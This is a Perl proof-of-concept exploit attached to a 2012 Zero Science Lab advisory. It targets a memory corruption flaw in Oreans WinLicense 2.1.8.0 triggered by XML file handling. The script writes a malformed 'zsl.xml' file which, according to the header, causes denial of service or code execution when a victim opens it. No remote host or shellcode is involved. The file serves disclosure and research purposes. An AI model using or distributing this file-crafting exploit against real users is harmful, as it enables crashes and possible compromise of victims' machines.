#!/usr/bin/perl # # # Oreans WinLicense v2.1.8.0 XML File Handling Unspecified Memory Corruption # # # Vendor: Oreans Technologies # Product web page: http://www.oreans.com # Affected version: 2.1.8.0 (32/64bit) # # Summary: WinLicense combines the same protection-level as Themida with the # power of advanced license control, offering the most powerful and flexible # technology that allows developers to securely distribute trial and registered # versions of their applications. # # Desc: WinLicense is prone to an unspecified memory corruption vulnerability. # An attacker can exploit this issue by tricking a victim into opening a malicious # XML file to execute arbitrary code and to cause denial-of-service conditions. # # Tested on: Microsoft Windows XP Professional SP3 (EN) (32bit) # Microsoft Windows 7 Ultimate SP1 (EN) (64bit) # # # Vulnerability discovered by Gjoko 'LiquidWorm' Krstic # @zeroscience # # # Advisory ID: ZSL-2012-5080 # Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2012-5080.php # # # 20.03.2012 # # use strict; my $file = "zsl.xml"; my $hit = "Joxy-\\x\\-Poxy"; print "\n\n[*] Creating $file file...\n"; open ZSL, ">./$file" || die "\nCan't open $file: $!"; print ZSL $hit; print "\n[.] File successfully mounted!\n\n"; close ZSL;